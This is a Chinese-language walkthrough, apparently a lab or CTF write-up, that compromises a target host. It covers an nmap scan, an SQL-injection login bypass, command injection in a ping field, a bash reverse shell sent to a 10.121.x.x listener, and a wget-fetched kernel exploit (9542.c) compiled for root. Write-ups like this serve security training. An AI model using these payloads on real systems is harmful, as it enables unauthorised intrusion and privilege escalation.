0x01信息收集
nmap -sV -O 10.121.65.83
0x02 万能密码&&命令执行
访问80端口(经测试 443端口并没有办法访问)
登录框尝试弱口令和sql注入 发现存在万能密码
admin'#
存在一个ping命令,尝试通过管道符看是否会执行命令
127.0.0.0|id
存在命令执行漏洞,那么反弹一个shell即可
127.0.0.1|bash -i >& /dev/tcp/10.121.65.78/4444 0>&1
0x03 权限提升
通过suid尝试提权
find / -perm -u=s -type f 2>/dev/null 查找有权限的文件
发现并没有可以利用的地方
接着查看操作系统版本号
查看linux系统版本信息命令:lsb_release -a
查看内核版本 uname -a
发现是CenOS 4.5 内核为 linux 2.6.9
攻击机上开启web服务
python2 -m SimpleHTTPServer 80
然后在靶机上通过wget下载9542.c,在靶机上进行编译(因为这个脚本只支持x86,在64上无法编译。)
cd /tmp
wget 10.121.65.78/9542.c
这里要到tmp目录下才能下载,否则其他目录都没办法写入
gcc 9542.c -o 9542
./9542
186
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
